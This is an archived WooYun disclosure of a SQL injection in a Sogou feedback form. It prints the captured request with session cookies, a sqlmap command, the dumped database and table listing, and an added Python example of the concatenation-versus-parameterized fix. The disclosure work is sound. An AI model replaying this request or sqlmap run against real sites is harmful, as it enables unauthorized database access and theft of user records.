Title: 搜狗某处SQL注入泄露22w用户信息 (SQL injection in a Sogou endpoint exposes 22w, i.e. 220,000, user records)
Vendor: Sogou
Author: 黑色键盘丶
Submitted: 2016-05-15 10:24
Published: 2016-06-30 08:20
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 20
Status: Confirmed by vendor
Tags: injection technique
Vulnerability details
Capture the request sent from http://fankui.help.sogou.com/index.php/web/web/index?type=6 and inspect it. Appending a single quote to a parameter triggers a database error.

sqlmap command: sqlmap.py -r 1.txt --dbs
---------------- packet -------
POST /index.php/web/web/addShenSu HTTP/1.1
Host: fankui.help.sogou.com
Proxy-Connection: keep-alive
Content-Length: 120
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48 * D629; SUID=0E1649DE2208990A000000005734A933; m=45390 * EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [email protected]/* @@@@@@@@@@; YYID=45390 * EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260

shensu%5BwebAdr%5D=HTTP%3A%2F%2Fwww.sogou.com%2F&shensu%5Breason%5D=1&shensu%5Bcontact%5D=313%40q.com&webContactWayType=
Database information
available databases [3]:
[*] information_schema
[*] sogou_zhanzhang
[*] test
Tables in the current database
Database: sogou_zhanzhang
+-------------------------------+----------+
| Table                         |  Entries |
+-------------------------------+----------+
| deadlink_wap_data             | 15191050 |
| url_submit                    |   547950 |
| url_submit_view               |   547950 |
| website                       |   270697 |
| website_view                  |   270697 |
| `user`                        |   220754 |
| sitemap                       |   175918 |
| sitemap_copy                  |   175417 |
| sitemap_view                  |   168249 |
| site_name                     |    73232 |
| website_precision             |    67856 |
| site_name_view                |    65060 |
| fault_block_log               |    54773 |
| sitemap_wap                   |    52806 |
| fault_block                   |    51056 |
| sitemap_wap_view              |    48773 |
| sitemap_invitation            |    45320 |
| sitemap_invitation_view       |    43771 |
| site_icon                     |    42416 |
| site_icon_view                |    42067 |
| spider_pressure_feedback      |    31070 |
| sitemap_invitation_log        |    28583 |
| site_logo                     |    27750 |
| site_logo_view                |    25608 |
| site_name_log                 |    24155 |
| spider_pressure_feedback_view |    23755 |
| web2wap                       |    20046 |
| web2wap_view                  |    19268 |
| site_logo_log                 |    17607 |
| renzheng_log                  |    16555 |
| supply_fetch                  |    14501 |
| site_icon_log                 |    13925 |
| renzheng                      |     9324 |
| fb_updateshensu               |     5427 |
| fb_shensu                     |     5341 |
| web2wap_log                   |     4917 |
| fb_img                        |     3720 |
| redirection                   |     3696 |
| redirection_view              |     3696 |
| tb_member                     |     3682 |
| feedback                      |     3270 |
| fb_tool                       |     2906 |
| feedback_view                 |     2773 |
| url_shoulu                    |     2577 |
| umis_waitingfavicon_log       |     2568 |
| umis_waitingfavicon           |     2520 |
| site_param                    |     1992 |
| sitemap_blacklist             |     1917 |
| site_param_view               |     1825 |
| website_precision_log         |     1064 |
| user_change_log               |      968 |
| redirection_log               |      561 |
| fb_suggestion                 |      289 |
| fb_jubao                      |      201 |
| fb_record                     |      153 |
| renzheng_set                  |      106 |
| fb_kuaizhao                   |       81 |
| mail_view                     |       78 |
| backend_user                  |       74 |
| website_log                   |       63 |
| product_black_list            |       24 |
| user_invitation               |       19 |
| notice                        |       18 |
| fb_updatetool                 |       14 |
| website_precision_maxid       |        7 |
| columnist                     |        5 |
| partner_white_list            |        5 |
| mail_group                    |        1 |
| site_param_log                |        1 |
+-------------------------------+----------+
(The names website, sitemap, redirection, feedback, notice and columnist appeared in Chinese in the extracted copy and are back-translated here; their exact original spelling is assumed. The 220,754-row `user` table is the source of the "22w user records" in the title.)
Proof of vulnerability: (the same captured request, sqlmap command and database listing as in the details section above)
Fix suggestion:
Filter the input.
Copyright notice: please credit the source. 黑键盘丶@WooYun
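As an added illustration (not code from the report or from Sogou), the following Python stands in for the server-side handler of the captured addShenSu request with an in-memory SQLite table: only the parameter names shensu[webAdr], shensu[reason] and shensu[contact] come from the packet above, while the table name, columns and sample body are constructed. It reproduces why the single quote the author appended produces a database error when values are concatenated into the SQL text, and shows the fix behind "filter the input": a bound parameter stores the same value without ever being parsed as SQL.

```python
import sqlite3
import urllib.parse

# Constructed request body with the same shape as the packet captured in the report;
# only the parameter names (shensu[webAdr], shensu[reason], shensu[contact]) are taken from it.
SAMPLE_BODY = ("shensu%5BwebAdr%5D=HTTP%3A%2F%2Fwww.sogou.com%2F"
               "&shensu%5Breason%5D=1&shensu%5Bcontact%5D=313%40q.com&webContactWayType=")
# The author's probe: the same body with a single quote (%27) appended to the contact value.
PROBE_BODY = SAMPLE_BODY.replace("313%40q.com", "313%40q.com%27")

def parse_shensu(body):
    """Decode the form body and return the three shensu[...] fields as a dict."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    return {k: fields.get("shensu[%s]" % k, [""])[0] for k in ("webAdr", "reason", "contact")}

def new_db():
    """In-memory SQLite table standing in for the server-side store (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fb_shensu (webAdr TEXT, reason INTEGER, contact TEXT)")
    return conn

def insert_vulnerable(conn, f):
    """Values spliced into the SQL text: a quote in any field rewrites the statement."""
    sql = "INSERT INTO fb_shensu VALUES ('%s', %s, '%s')" % (f["webAdr"], f["reason"], f["contact"])
    conn.execute(sql)

def insert_safe(conn, f):
    """Bound parameters: the driver passes values separately, so they are never parsed as SQL."""
    conn.execute("INSERT INTO fb_shensu VALUES (?, ?, ?)",
                 (f["webAdr"], f["reason"], f["contact"]))

def probe(insert, body):
    """Run one request body through an insert routine; 'error' means the database rejected it."""
    conn = new_db()
    try:
        insert(conn, parse_shensu(body))
        return "ok"
    except sqlite3.Error:
        return "error"
    finally:
        conn.close()

def stored_contact_safe(body):
    """What the parameterised insert actually stores for the contact field."""
    conn = new_db()
    try:
        insert_safe(conn, parse_shensu(body))
        return conn.execute("SELECT contact FROM fb_shensu").fetchone()[0]
    finally:
        conn.close()
```

The concatenated version accepts the normal body but fails on the quoted one, which is exactly the error-based signal the report describes; the parameterised version accepts both and stores the quote as plain data.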